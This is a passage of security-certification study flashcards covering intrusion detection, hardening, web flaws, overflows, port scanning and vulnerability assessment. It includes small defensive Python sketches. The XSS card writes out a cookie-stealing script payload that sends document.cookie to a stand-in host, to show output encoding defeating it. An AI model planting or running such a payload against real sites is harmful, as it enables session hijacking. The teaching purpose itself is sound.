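        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        return digest in KNOWN_BAD_SHA256

    for file in Path(".").rglob("*"):
        try:
            if file.is_file() and matches_signature(file):
                print(f"Known signature matched: {file}")
        except OSError:
            continue  # unreadable file; a real scanner would log this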
Virus Removal as a Recovery Method
Be familiar with the argument for using virus removal as a recovery method.
System Restore, available in Windows Me, Windows XP, Windows Vista, and Windows 7, is a tool that restores the registry and critical system files to a previous state. A virus can cause…
Show answer and Breakdown
Answer:
an operating system to hang, and a subsequent hard reboot can corrupt a system restore point created the same day. Restore points from preceding days should help return the computer to a functional state, provided the virus isn't programmed to damage restore files. Unfortunately, some viruses can deactivate System Restore and other vital tools such as Task Manager and Command Prompt.
Operating System Re-installation as a Recovery Method
How operating system re-installation is used as a recovery method.
Reinstalling the operating system is another measure of virus removal. It entails reformatting the computer’s hard drive and installing the OS from its original media, or restoring…
Show answer and Breakdown
Answer:
the partition with a clean backup image. The advantages of this method are that it is simple, it can be quicker than running several antivirus scans, and it is certain to eliminate the malware. The disadvantages include having to reinstall all other software, reconfigure settings, and restore user preferences. Data can be preserved by booting off a Live CD, or by installing the hard drive in another computer and booting from that computer's operating system. Use extra caution when restoring anything from an infected system to prevent contamination of the new computer.
What is an Intrusion Prevention System (IPS)?
Define Intrusion Prevention System (IPS).
An intrusion prevention system (IPS) is a network security device that scans network and/or system activities for malicious or unwarranted…
Show answer and Breakdown
Answer:
behavior and can respond, in real-time, to prohibit or prevent those activities. As an example, Network-based IPS will function in-line to scan all network traffic for malicious code or attacks. When malicious activity is picked up, it can eliminate the harmful packets while permitting all other traffic to pass. Intrusion prevention mechanisms are considered by some as an extension of intrusion detection (IDS) technology.
What is a Host-Based Intrusion Prevention System (HIPS)?
Define Host-Based Intrusion Prevention System (HIPS).
A host-based intrusion prevention system (HIPS) is an application usually deployed on a single computer. It can deal with encrypted and unencrypted traffic equally, but it cannot detect events scattered over the network. A host-based IPS (HIPS) is where the intrusion prevention mechanism is applied to a specific IP address, usually on a…
Show answer and Breakdown
Answer:
single computer. HIPS complements traditional fingerprint-based and heuristic antivirus detection methods, since it does not require ongoing updates to counteract new malware. Malicious code needs to alter the system or certain software on a computer to successfully disrupt the operating system. HIPS will pick up on these red flags (alterations) and prohibit the action automatically or alert the user for permission.
Host Hardening
Define and describe host hardening.
Host hardening begins with a requirements evaluation to determine server function and the risks involved. Hardening is a fine balance between security and usability: in practical terms, the more secure a device is, the less usable it becomes. A Standard Operating Environment is a…
Show answer and Breakdown
Answer:
specification for employing a standard architecture and applications within an organization. There is no formal SOE standard; however, organizations usually employ standard disk images, operating systems, computer hardware, and standard applications and software within their own organization.
Group Policy Controls
What control ability exists within Group Policy?
The goals for each Group Policy implementation will differ based on user location, job requirements, computer proficiency, and corporate security requirements. In some cases, you might…
Show answer and Breakdown
Answer:
deactivate functionality from users’ computers to prevent them from modifying system configuration files, or remove applications that are not required for users to perform their jobs. In other cases, a Group Policy might be applied to configure operating system options, specify Internet Explorer settings, or establish a security policy. A restricted shell is used to establish a controlled environment (more controlled than the standard shell).
Purpose, Use and Examples of Warning Banners
Define Warning Banners, then provide the purpose and use examples of them.
Warning banners: A widely used method for controlling computer access is the use of warning banners. Warning banners are an effective tool for providing adequate notice regarding the obligations and responsibilities entailed in using the server and networking environments. The purpose of warning banners:
Show answer and Breakdown
Answer:
From a legal standpoint, warning banners establish the level of expected privacy; from a business standpoint, they serve as consent to real-time monitoring. Real-time monitoring can be conducted for security reasons, business reasons, or technical network performance reasons. These banners tell users that their connection to the network signals their consent to monitoring. Warning banners can also be used to establish the system or network administrator's common authority to consent to a law enforcement search. Some use examples of warning banners: Access to this system and network is restricted. Use of this system and network is for official business only. Systems and networks are subject to monitoring at any time by the owner. Using this system implies consent to monitoring by the owner. Unauthorized or illegal users of this system or network will be subject to discipline or prosecution.
What is Asset Management (Inventory Control)?
Define asset management (inventory control).
Asset management (inventory control) concerns the management of an organization's assets. An asset is defined…
Show answer and Breakdown
Answer:
as an object of value. It is vital for a company to identify, monitor, classify, and assign ownership for its most important assets. The primary objective of asset management is to ensure all assets are protected.
What is data exfiltration?
Define data exfiltration.
The definition of data exfiltration:
Show answer and Breakdown
Answer:
Data exfiltration, also known as data extrusion, is the unwarranted transfer of data from a computer.
What is a Host-Based IDS (HIDS)
Define Host-Based Intrusion Detection Systems (HIDS).
A host-based IDS (HIDS) is an Intrusion Detection System that’s applied to the system to be scanned for unwarranted activity. HIDS is specifically concerned with…
Show answer and Breakdown
Answer:
the data that is directed to or originating from the system on which the HIDS is installed. In addition to network traffic, it also monitors other aspects of the system, such as file system access and integrity and user logins, to capture malicious activity. BlackICE Defender and Tripwire are examples of HIDS. Tripwire calculates checksums of selected files and examines them for modifications.
What is a Network Intrusion Prevention System (NIPS)?
Define a Network Intrusion Prevention System (NIPS).
A network intrusion prevention system (NIPS) is a hardware/software platform that is programmed to…
Show answer and Breakdown
Answer:
detect, examine, and report on security related events. It examines traffic and based on the security policy, can eliminate malicious traffic. It can pick up events scattered over the network and respond.
What is a Network Intrusion Detection System (NIDS)?
Define a Network Intrusion Detection System (NIDS).
A network intrusion detection system (NIDS) is an intrusion detection mechanism that attempts to pick up on malicious activity such as…
Show answer and Breakdown
Answer:
denial-of-service attacks, port scans, or even attempts to hack computers by monitoring network traffic. A NIDS scans all incoming packets and tries to isolate anomalous patterns known as signatures or rules. It also tries to detect incoming shellcode in the same way an ordinary intrusion detection system does.
What is the Difference Between HIPS and NIPS?
What are the main differences between Host-Based Intrusion Prevention Systems (HIPS) and Network Intrusion Prevention Systems (NIPS)?
HIPS can deal with encrypted and unencrypted traffic, because it can examine the data post-decryption on the host. NIPS does not rely on…
Show answer and Breakdown
Answer:
processor and memory on computer hosts but uses its own CPU and memory. A NIPS is a single point of failure, which is regarded as a detriment; however, this also makes it easy to maintain. This aspect applies to all network devices and can be mitigated by designing the network accordingly. A NIPS can detect and respond to events dispersed across the network, in contrast to a HIPS, where that function is restricted to the host's own data; reporting each event from hosts to a central decision-making mechanism and waiting for a response to block it would take too much time.
What is the Statistical Anomaly Detection Method?
What is the Statistical Anomaly Detection Method and what is its role in IDS detection?
Statistical Anomaly Detection: The Statistical Anomaly Detection method, also known as behavior-based detection, cross-checks the current system operating characteristics against many baseline factors such as…
Show answer and Breakdown
Answer:
CPU utilization, file access patterns, disk usage, etc. Using this technique, the Intrusion Detection System either lets a network administrator define profiles of authorized activities or is set in learning mode so that it can learn what qualifies as normal activity. A considerable amount of time is needed to accurately measure the rate of false negatives an IDS produces. The main disadvantage of this approach is that an attacker can gradually change his behavior over time and trick the system.
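A minimal sketch of behavior-based detection, assuming a baseline of CPU-utilization samples gathered during learning mode: a new sample is flagged when it falls more than a few standard deviations from the learned mean. A real IDS would profile many factors at once.

    from statistics import mean, stdev

    # Hypothetical baseline collected while the IDS was in learning mode.
    baseline = [12.0, 15.5, 11.2, 14.8, 13.1, 12.9, 14.0]
    mu, sigma = mean(baseline), stdev(baseline)

    def is_anomalous(sample: float, threshold: float = 3.0) -> bool:
        # Flag samples more than `threshold` standard deviations from the mean.
        return abs(sample - mu) > threshold * sigma

    print(is_anomalous(13.4))   # False: consistent with learned behavior
    print(is_anomalous(96.0))   # True: possible intrusion or runaway process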
The Route of Vulnerabilities in Applications
How do vulnerabilities exist in applications, and why is proper application security so important?
Application security consists of steps taken throughout the application’s life-cycle to avoid exceptions in the security policy of an application or…
Show answer and Breakdown
Answer:
inherent system vulnerabilities through flaws in the design, development, deployment, upgrade, or maintenance of the application. Applications only control the use of resources granted to them, not which resources are granted to them; they, in turn, determine the use of these resources by users of the application.
Web application security design considerations
What must be considered regarding web application security?
Secure by design, by default, by deployment: When designing a Web application, the objective of the software architect is to…
Show answer and Breakdown
Answer:
reduce the degree of complexity by dividing tasks into different areas of concern while designing a secure, high-performance application. Follow these guidelines to make sure your application satisfies your requirements and performs well in scenarios common to Web applications.
Partition your application logically
How to partition your application logically.
Use layering to separate your application logically into presentation, business, and data access layers. This helps create …
Show answer and Breakdown
Answer:
manageable code and allows you to monitor and optimize the performance of each layer separately. A clear logical separation also provides wider choices for scaling your application.
Use abstraction to implement loose coupling between layers
How to use abstraction to implement loose coupling between layers.
This can be achieved by identifying interface components, such as a façade with well-known inputs and…
Show answer and Breakdown
Answer:
outputs that translate requests into a format understood by components within the layer. In addition, you can use interface types or abstract base classes to define a shared abstraction that interface components must implement.
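The Python sketch below illustrates the idea with hypothetical names (CustomerRepository, BillingService): the business layer depends only on the shared abstraction, so the data access implementation can be swapped without touching it.

    from abc import ABC, abstractmethod

    class CustomerRepository(ABC):
        """Shared abstraction that the data access layer must implement."""
        @abstractmethod
        def find(self, customer_id: int) -> dict: ...

    class SqlCustomerRepository(CustomerRepository):
        def find(self, customer_id: int) -> dict:
            # Illustrative only; a real implementation would query a database.
            return {"id": customer_id, "name": "Alice"}

    class BillingService:
        # Business layer: coupled to the abstraction, not the concrete class.
        def __init__(self, repo: CustomerRepository):
            self.repo = repo

        def invoice(self, customer_id: int) -> str:
            return f"Invoice for {self.repo.find(customer_id)['name']}"

    print(BillingService(SqlCustomerRepository()).invoice(42))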
Understand how components will communicate with each other
Why you should understand how components will communicate with each other.
This necessitates an understanding of the deployment scenarios your application must accommodate. You must ascertain if…
Show answer and Breakdown
Answer:
communication across physical boundaries or process boundaries should be supported, or if all elements will run within the same process.
Consider caching to minimize server round trips in Web Apps
Why you should consider caching to minimize server round trips in Web Apps.
When designing a web application, think about using methods such as caching and output buffering to minimize round trips between the browser and the…
Show answer and Breakdown
Answer:
Web server, and between the Web server and downstream servers. A properly designed caching strategy is probably the most important performance-related design specification. ASP.NET caching features include output caching, partial page caching, and the Cache API. Design your application to take advantage of these features.
Implement Logging and Instrumentation
Why implementing logging and instrumentation is best practice in application security.
You should audit and log activities across the layers and tiers of your application. These logs can be…
Show answer and Breakdown
Answer:
tools to trace suspicious activity, which frequently signals a possible attack on the system. Be aware that it can be challenging to log problems that occur with script code running in the browser.
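A minimal sketch using Python's standard logging module; the file name, logger name, and threshold are illustrative. In production, the handler would typically ship records to a centralized, tamper-resistant log store for later correlation.

    import logging

    logging.basicConfig(
        filename="app_audit.log",
        level=logging.INFO,
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
    )
    log = logging.getLogger("business_layer")

    def transfer_funds(user: str, amount: float) -> None:
        # Routine activity is logged at INFO for audit trails.
        log.info("transfer requested user=%s amount=%.2f", user, amount)
        if amount > 10_000:
            # Unusual activity gets a higher severity so reviews can spot it.
            log.warning("large transfer flagged user=%s amount=%.2f", user, amount)

    transfer_funds("alice", 25_000.00)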
Consider authenticating users across trust boundaries
Application Security best practice – consider authenticating users across trust boundaries.
Why is authenticating users across trust boundaries a best practice for application security?
Show answer and Breakdown
Answer:
You should design your application to authenticate users whenever they cross a trust boundary, such as when accessing a remote business layer from the presentation layer.
Design your Web application to run using a least-privileged account
Application security best practice – Design your Web application to run using a least-privileged account.
Why should you design your web application to run using a least-privileged account?
Show answer and Breakdown
Answer:
If an attacker is able to hijack a process, the process identity should have restricted access to the file system and other resources to limit the possible damage.
Application Flaws – Cross Site Scripting (XSS) Vulnerabilities
What are Cross Site Scripting (XSS) Vulnerabilities in applications and how do these vulnerabilities occur?
XSS: Cross Site Scripting vulnerabilities or XSS flaws come about whenever an application takes user-supplied data and sends it to a Web browser without…
Show answer and Breakdown
Answer:
first validating or encoding the content. Attackers frequently locate these flaws in Web applications. XSS flaws allow an attacker to run a script in the victim's browser, giving the culprit free rein to hijack user sessions, deface Web sites, and possibly launch worms, viruses, or other malware to access and steal sensitive data belonging to the user.
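The core defense is validating input and encoding output. A minimal Python sketch using html.escape shows how user-supplied text is rendered as inert text rather than executable markup; the cookie-stealing payload is a standard textbook example.

    import html

    def render_comment(user_supplied: str) -> str:
        # Encode special characters so the browser treats the input as text,
        # not as markup or script.
        return f"<p>{html.escape(user_supplied)}</p>"

    payload = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'
    print(render_comment(payload))
    # The <, >, and " characters come out as &lt;, &gt;, and &quot;,
    # so the script never executes in the victim's browser.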
What is Application Sandboxing?
What is an application sandbox?
A sandbox is a security mechanism for separating running programs. It is often used to run…
Show answer and Breakdown
Answer:
untested code or untrusted programs from unverified third parties, suppliers, untrusted users, and untrusted websites. The sandbox offers a strictly controlled set of resources for guest programs to run in, such as scratch space on disk and in memory. Network access, the ability to inspect the host system, and reading from input devices are usually blocked or heavily restricted. In this sense, sandboxes are a type of virtualization.
The Importance of Secure Coding Standards
What is the importance of having secure coding standards?
Secure coding standards specify rules and recommendations to guide the development of secure software systems. Establishing secure coding standards…
Show answer and Breakdown
Answer:
sets the foundation for secure system development as well as a common set of criteria that can be applied to examine and evaluate software development efforts and software development tools and processes.
Privilege Escalation in Web Applications
Does privilege escalation play a similar role in web application security, as it does in network security?
As we have discussed before, privilege escalation is the act of exposing a bug or design error in a software application to gain access to…
Show answer and Breakdown
Answer:
resources that otherwise would have been safeguarded from an application or user. The outcome is the application performs actions with more privileges than intended by the application developer or system administrator.
Improper Storage of Sensitive Data in Web Applications
What to consider regarding storage of sensitive data in web applications.
The application stores sensitive data in memory that is not secured, or that has been…
Show answer and Breakdown
Answer:
improperly locked, which might allow the memory to be written to swap files on disk by the virtual memory manager. In this scenario data is more accessible to external agents.
What is Fuzzing / Fault Injection?
Define and describe fuzzing / fault injection.
Fuzzing, or fuzz testing is a method that employs human or computer-based testing in which all variants of anticipated and unanticipated input is…
Show answer and Breakdown
Answer:
fed to your application. For example, if your application expects a user to enter a surname, a fuzzer would enter numbers, punctuation, extended and control characters, and so on. Because this testing requires little or no knowledge of the application being tested, it is also called black-box testing.
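A toy fuzzer sketch in Python, assuming a hypothetical command-line target named ./parse_surname: it feeds random printable and control characters to the program and watches for crashes (a negative return code means the process was killed by a signal).

    import random
    import string
    import subprocess

    TARGET = "./parse_surname"   # hypothetical program under test

    def random_input(max_len: int = 256) -> str:
        # Mix letters, digits, punctuation, and control characters (NUL excluded,
        # since command-line arguments cannot contain it).
        alphabet = string.printable + "".join(chr(c) for c in range(1, 32))
        return "".join(random.choice(alphabet) for _ in range(random.randint(0, max_len)))

    for i in range(1000):
        data = random_input()
        result = subprocess.run([TARGET, data], capture_output=True)
        if result.returncode < 0:
            print(f"Crash on iteration {i}: input={data!r}")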
Secure Cookie Storage and Transmission
Know how to properly handle cookie storage and transmission.
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to transmit state information to a user’s browser and for the browser to return the state information to the originating website. The state information can be used for authentication, identification of a user session, user’s preferences, shopping cart contents, or other activities that can be processed by storing text data on the user’s computer. Cookies cannot be…
Show answer and Breakdown
Answer:
programmed to carry or transmit viruses, nor can they deposit malware on the host computer. They can, however, be used by spyware to track a user's browsing history, a serious privacy concern that prompted U.S. and European lawmakers to take aggressive action. Hackers can also steal cookies to gain access to a victim's web account.
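On the defensive side, secure handling largely comes down to cookie attributes. A small sketch using Python's http.cookies: Secure restricts the cookie to HTTPS, HttpOnly hides it from JavaScript (blunting theft via XSS), and SameSite limits cross-site sending. The session value is illustrative.

    from http import cookies

    c = cookies.SimpleCookie()
    c["session_id"] = "f3a9c0d1e2"          # illustrative session token
    c["session_id"]["secure"] = True        # only sent over HTTPS
    c["session_id"]["httponly"] = True      # invisible to document.cookie
    c["session_id"]["samesite"] = "Strict"  # not sent on cross-site requests

    print(c.output())
    # e.g. Set-Cookie: session_id=f3a9c0d1e2; HttpOnly; SameSite=Strict; Secure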
Client-side processing vs. server-side processing
Know the difference between client-side processing vs. server-side processing.
Client-side processing is the function of operations performed by the client in a client-server relationship in a computer network. A client is a system application that’s executed on a user’s computer with…
Show answer and Breakdown
Answer:
connection to a server when needed. Operations may be conducted client-side when they need data available on the client but not the server, when the user needs to provide input, or when the server lacks the processing power to perform the operations in a timely fashion for all the clients it serves. Also, if operations can be handled by the client without transmitting data over the network, they may require less time and bandwidth and incur less security risk.
What is the Microsoft Ajax Library?
What is the Microsoft Ajax Library and why is it useful for application security?
The Microsoft Ajax Library is a JavaScript library that provides the features for the client portion of…
Show answer and Breakdown
Answer:
the ASP.NET AJAX framework. Components: The library provides a foundation for producing either visual or non-visual JavaScript components. A global JavaScript object, Sys.Application, handles the lifecycle management of client components.
ASP.NET Script Controls and Extenders
What are script controls and extenders?
The server portion of the ASP.NET AJAX framework introduces two categories of ASP.NET server controls for implementing…
Show answer and Breakdown
Answer:
client capabilities to server controls. An Extender is used to enhance client functionality to an existing ASP.NET control, without having to produce a new server control. A Script Control is a standalone ASP.NET control that provides both server and client functionality.
What is ASP.NET State Management?
Define and describe the concept of State Management in ASP.NET.
In an ASP.NET Web application, details about the current user, his preferences, and the application’s current configuration are logged as values of global variables. This data is also…
Show answer and Breakdown
Answer:
retained as controls and properties of objects in memory to be utilized by the application until it is released or removed. This data is collectively regarded as the state of a web page. To protect the state information of a web page between round-trips or page post backs, ASP.NET offers the user several server-based as well as client-based methods. Maintaining the state for a web page across round-trips and page post backs is called state management.
Client-Based Techniques for State Management
What are the primary client-based techniques for state management and what are some of the advantages and disadvantages?
Client-based techniques maintain the state of a Web page by holding information either on the page or on the client computer. If the data is stored on the client, it is submitted to the web server by the client with each web request. Advantages and disadvantages of storing data on the client computer: storing information on the client gives better scalability, because the server does not have to hold state for every user, and page load times for the client are improved; however, bandwidth utilization can increase when several users send requests simultaneously. The main disadvantage of storing data on the client side is that an unauthorized user may access and compromise the data. Some client-based techniques for state management include:
Show answer and Breakdown
Answer:
View State: View state is used to persist changes to the state of a web page across postbacks. View state data is stored as base64-encoded strings in one or more hidden fields and is retrieved by using the ViewState property of a web page. The property provides a dictionary object and maintains page or control property values between multiple user requests for the same web page. Control State: View state data of a custom control for a web page can be stored by using the ControlState property rather than the ViewState property of the web page. The ControlState property holds control property data during multiple round trips to the server. The control state data pertains to a custom control and is retained even if the view state is inactive at the page level. Hidden Fields: A hidden field is used to keep state information for a Web page in a HiddenField control. The control is delivered as an HTML element. A hidden field holds data that's not visible on a web page; however, it is sent to the web server along with the page postbacks. Cookies: A cookie is a client-based method and is a condensed packet of information that stores key-value pairs on the client side. The information correlates to a specific domain and is sent along with the client request from a Web browser. Cookies hold user preferences and offer a personalized browsing experience. Query Strings: A query string is a client-based method that keeps state information by affixing it to the URL of a Web page. The URL is separated from the state information by a question mark '?'. The state data is represented by a set of key-value pairs, each of which is separated by an ampersand character.
What are Buffer Overflow Attacks?
Describe buffer overflow.
Buffer overflow is the state of an application that has received more data than it is configured to handle. It benefits an attacker not only to deploy malicious code on…
Show answer and Breakdown
Answer:
the target system but also to implant backdoors on the target system to enable further attacks. Buffer overflow attacks are the result of poor programming or faulty memory management by application developers.
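Memory-safe languages make a genuine overflow hard to demonstrate directly, so the Python sketch below simulates a fixed-capacity buffer to show the bounds check that vulnerable C routines (strcpy-style copies) omit; the class and names are illustrative only.

    class FixedBuffer:
        """Simulates a fixed-size buffer to illustrate bounds checking."""
        def __init__(self, capacity: int):
            self.capacity = capacity
            self.data = bytearray(capacity)

        def write(self, payload: bytes) -> None:
            # This is the length check that vulnerable C code omits.
            if len(payload) > self.capacity:
                raise OverflowError(
                    f"payload of {len(payload)} bytes exceeds {self.capacity}-byte buffer"
                )
            self.data[:len(payload)] = payload

    buf = FixedBuffer(16)
    buf.write(b"short input")       # fits within the buffer
    try:
        buf.write(b"A" * 64)        # in C, this would overwrite adjacent memory
    except OverflowError as err:
        print("rejected:", err)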
What is Stack Overflow?
Describe a stack overflow attack.
Stack overflow: In software, a stack overflow is the result of using more memory on the call stack than has been allotted to it. The call stack holds a limited amount of…
Show answer and Breakdown
Answer:
memory, often fixed at the start of the program. The size of the call stack depends on various factors, including the programming language, machine architecture, multi-threading, and amount of available memory. When a program tries to use more space than is available on the call stack, the stack is said to overflow, often causing a program crash. This is usually caused by one of two types of programming errors: infinite (or excessively deep) recursion, or very large stack allocations.
What is Format String Overflow?
Describe a format string overflow attack.
String format functions in the C library take a variable number of arguments, of which the format string is always required. The format string can have…
Show answer and Breakdown
Answer:
two types of data: printable characters and format-directive characters. To access the rest of the parameters that the calling function pushed on the stack, the string format function parses the format string and interprets the format directives as they are read.
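The classic attack targets C's printf family, but Python's str.format has an analogous hazard when the format string itself is user-controlled, as this hedged sketch shows; the Config class and its secret are hypothetical.

    class Config:
        SECRET_KEY = "s3cr3t"   # hypothetical application secret

    config = Config()

    # Dangerous: the attacker controls the format string, and format
    # directives can traverse object attributes to leak data.
    user_supplied = "Hello {0.__class__.SECRET_KEY}"
    print(user_supplied.format(config))          # prints: Hello s3cr3t

    # Safe: treat user input strictly as data, never as the template.
    template = "Hello {name}"
    print(template.format(name=user_supplied))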
What is an Integer Overflow?
Describe the scenario of an integer overflow.
In computer programming, an integer overflow happens when an arithmetic operation tries to…
Show answer and Breakdown
Answer:
create a numeric value that is too large to be represented within the available storage space. For example, adding 1 to the largest value that can be represented constitutes an integer overflow.
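Python's own integers are arbitrary-precision, but fixed-width machine integers can be demonstrated with ctypes. The sketch below shows a 32-bit signed value wrapping from its maximum to its minimum, which is exactly the overflow described above.

    import ctypes

    # A 32-bit signed integer can represent at most 2**31 - 1 = 2147483647.
    largest = ctypes.c_int32(2**31 - 1)
    print(largest.value)                       # 2147483647

    # Adding 1 wraps around to the most negative representable value;
    # ctypes performs no overflow checking, just like C arithmetic.
    overflowed = ctypes.c_int32(largest.value + 1)
    print(overflowed.value)                    # -2147483648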
What is Race Condition or Race Hazard?
Describe the race condition or race hazard vulnerability.
A race condition or race hazard is an error in an electronic system or process where the output or result of the process is unexpectedly and vitally dependent on the sequence or timing of other events. The term is derived from the idea of two signals racing each other to affect the output first. Race conditions can occur…
Show answer and Breakdown
Answer:
in electronics systems, especially logic circuits, and in system software, especially multithreaded or distributed programs. A race condition may occur in a system of logic gates, where inputs vary. If a particular output is based on the state of the inputs, it may only be defined for steady-state signals. As the inputs change state, a brief delay will occur before the output changes, based on the physical condition of the electronic system.
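A classic software illustration: several threads race on an unsynchronized read-modify-write. In the Python sketch below, the final count frequently comes up short of the expected 400000, depending on interpreter and timing; guarding the update with the lock removes the race.

    import threading

    counter = 0
    lock = threading.Lock()

    def unsafe_increment(n: int) -> None:
        global counter
        for _ in range(n):
            counter += 1   # read-modify-write is not atomic: updates can be lost
            # Safe version: with lock: counter += 1

    threads = [threading.Thread(target=unsafe_increment, args=(100_000,)) for _ in range(4)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

    print(counter)   # expected 400000, but often less due to the race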
What is a Memory Leak Compromise?
Describe a memory leak or leakage compromise.
A memory leak or leakage is a particular type of memory consumption by a computer program where the program is incapable of releasing memory it has acquired. Memory leaks share common symptoms of other issues and can be properly identified by…
Show answer and Breakdown
Answer:
a programmer with access to the program source code; yet many people consider any unintended increase in memory usage a memory leak, even if this is technically inaccurate. Memory leaks compromise the performance of a computer by diminishing the amount of available memory. In extreme cases, so much of the available memory may become allocated that all or part of the system stops working properly, applications fail, or the system slows dramatically from thrashing.
What is a Resource Exhaustion Attack?
Define a resource exhaustion attack and its most common outcome.
What is Resource Exhaustion and what typically happens from one of these attacks?
Show answer and Breakdown
Answer:
Resource exhaustion is a simple denial-of-service condition that happens when the resources required to execute an action are entirely expended, preventing that action from occurring. The most common outcome of resource exhaustion is denial of service. Access control: in some situations it may be possible to force a system to "fail open" when resource exhaustion occurs. Issues in system architecture and protocol design can make systems more vulnerable to resource-exhaustion attacks, and a lack of low-level design consideration often plays a role. Resource exhaustion glitches are generally understood but challenging to prevent. Attacks typically work by making the target machine expend far more resources servicing a request than the attacker expends making it.
What is Port Scanning?
What is port scanning?
Port scanning is the first task in obtaining details of open ports on the target system. Port scanning is applied to locate a hack-able server with a flaw or vulnerability. A port is a…
Show answer and Breakdown
Answer:
mode of communication between two computers. Every service on a host is identified by a unique 16-bit number called a port. A port scanner is software designed to scan a network host for open ports. It is often used by administrators to run security checks of their networks, and by hackers to pinpoint running services on a host with a view to where it could be compromised. Port scanning is used to locate open ports in order to identify exploits related to the associated services and applications.
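A minimal full-connect scanner sketch in Python; true SYN scanning (covered next) requires raw sockets and elevated privileges. The target address is a TEST-NET placeholder: scan only hosts you are authorized to test.

    import socket

    TARGET = "192.0.2.10"   # placeholder address from the TEST-NET range

    for port in range(1, 1025):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)
            # connect_ex returns 0 when the full TCP handshake succeeds.
            if s.connect_ex((TARGET, port)) == 0:
                print(f"Port {port} is open")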
Common Port Scanning Techniques
What are the two most common port scanning techniques?
The first: TCP SYN scanning. TCP SYN scanning is also referred to as half-open scanning because a complete TCP connection is never opened. The attacker sends a SYN packet to the target port. If the port is open, the target responds with a SYN/ACK message, and the attacker then severs the connection by sending an RST packet. If the target instead responds with an RST packet, the port is closed. This type of scanning is difficult to track because the attacker never completes the 3-way handshake, and most sites do not log incomplete TCP connections. The second is:
Show answer and Breakdown
Answer:
TCP SYN/ACK scanning: In TCP SYN/ACK scanning, an attacker sends an SYN/ACK packet to the target port. If the port is closed, the victim thinks this packet was erroneously sent by the attacker and sends the RST packet to the attacker. If the port is open, the SYN/ACK packet is disregarded, and the port drops the packet. TCP SYN/ACK scanning is a type of stealth scanning.
What is Vulnerability Assessment?
Define and describe vulnerability assessment.
A vulnerability assessment is the method of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. Examples of networks / organizations that commonly would need to perform vulnerability assessments include…
Show answer and Breakdown
Answer:
but are not limited to, nuclear power plants, information technology systems, energy supply systems, water supply systems, transportation systems, and communication systems. Vulnerabilities are common weaknesses in program code, such as buffer overflows, XSS, SQL injection, etc. A piece of malware code that utilizes a newly discovered vulnerability in a software application, usually the operating system or a Web server, is known as an exploit.
The Five Steps of Vulnerability Assessment
What are the five steps of performing a vulnerability assessment?
Steps of Vulnerability Assessment: While the precision of a vulnerability assessment depends on the specific organization and its assets, the basic techniques for assessing vulnerability are outlined in these steps:
Show answer and Breakdown
Answer:
Establish a baseline: The baseline-reporting step sets up the starting point for basic system settings, including the base operating system and any installed applications. Review the code: In this step, a security administrator examines the code of the deployed applications to ascertain whether it is functioning optimally based on available technology. Simply assuming the code is acceptable is not enough; administrators must examine it to determine its technological soundness against current standards. Determine the attack surface: The attack surface is the code and services available in each application to all users, including unauthorized users. The more services and ports available to unauthorized users, the greater the attack surface; the larger the attack surface, the higher the degree of system vulnerability. Review the architecture: This task requires administrators to examine the system components and their interactions with the operating system and applications. Examining the architecture can help identify vulnerabilities in the way applications address system components, such as memory, which can be exploited in an attack. Review the design: After collecting all of the information, administrators must look at the design of these systems, from operating system to applications, to assess which vulnerabilities they can eliminate through stricter security settings or the removal of unnecessary code.
Risk Management – The Security Risk Implications of Business Decisions
We will take a deep look at the security risk implications of some of the more commonly made business decisions that organizations face. It is important to be able to analyze the scenarios to determine all possible risk possibilities and plan to mitigate them.
Every organization has confidential information and resources needed to accomplish its business activities. Sensitive information and resources are hot targets, vulnerable to both internal and external threats. Every organization makes critical business decisions that play an integral role in the viability and growth of the organization. It is crucial to determine and understand the risks associated with those decisions in order to preserve sustainability. Risk management of new products, new technologies, and user behaviors: The hazards of implementing new products, technologies, and user behaviors, if poorly managed, can exceed the business benefits. Methods for commercializing new technologies and products hold vital significance in today's competitive corporate world: they open up new opportunities, produce market leaders, and foster the growth and fortitude needed to face the onslaught of competition. New or changing business models/strategies: A business model exhibits the rationale of how an organization creates, delivers, and captures value (economic, social, or other forms of value). Business model development is inherent to business strategy. In theory and in practice, the term business model is used for a wide range of informal and formal descriptions that reflect core elements of a business, including purpose, offerings, strategies, infrastructure, organizational structures, trading practices, and operational processes and policies. Thus it offers a comprehensive picture of an organization from a high-level perspective. Once a business is formed, it either explicitly or implicitly applies…
Show answer and Breakdown
Answer:
a specific business model that outlines the architecture of the value creation, delivery, and capture mechanisms employed by the business enterprise. The fundamental purpose of a business model is to specify the manner and method by which the business enterprise delivers value to customers, attracts customers to pay for value, and turns those payments into profit. The business model also represents management's idea about what the customer wants, how they want it, and how the business can best perform to meet those needs, get paid for doing so, and turn a profit. Business models and strategies follow the various business requirements; these requirements can include partnership, outsourcing, or merging. Partnerships: A partnership is a for-profit business association of two or more members. Because the business aspect is broadly defined by state laws, and because "members" can include individuals, groups of individuals, companies, and corporations, partnerships are very fluid in form and vary in complexity. Each partner shares in the organization's profits and shares control of the business operation; a consequence of this profit sharing is that partners are jointly and severally liable for the partnership's debts. Internal and external influences: Various internal factors impact business decisions, such as demographics, lifestyle, personality, motivation, knowledge, attitudes, beliefs, and feelings. Business and consumer habits are also affected by culture, subculture, locality, loyalty, ethnicity, family, social class, past experience, reference groups, lifestyle, and marketing-mix factors. Psychological factors include an individual's attitudes, preferences, and beliefs, while personal factors include economic status, personality, age, profession, and lifestyle. Audit findings: Audit findings are a useful tool for implementing improvements within a quality management system. Findings and nonconformity statements aren't always clearly communicated, nor do they always provide enhancements to an organization. Effective audit findings mitigate incomplete findings, as well as findings that fail to support the intent of the process. An effective audit assists the organization in obtaining and analyzing findings from second- and third-party auditors, with the long-term goal of quality management system improvement. Compliance: Compliance is defined as dutifulness, obligingness, pliability, tolerance, and tractability. Compliance requires an organization to manage internal regulations as well as comply with national laws and the requirements of laws at the local level; this may result in conflicts. Client requirements: Requirements analysis for ongoing business viability entails tasks that evaluate the needs or conditions to be met for a new or modified product, identifying any conflicting requirements of the various stakeholders, such as beneficiaries or users. This is an early phase of what's known as requirements engineering, which includes all functions concerned with eliciting, analyzing, documenting, validating, and managing software or system requirements. Business analysts may attempt to make requirements fit within an existing system or model rather than starting from scratch and developing a system that reflects the needs of the client, and analysis may be performed by engineers or programmers rather than personnel who have interpersonal knowledge of the client's needs.
The Impact of De-Perimeterization
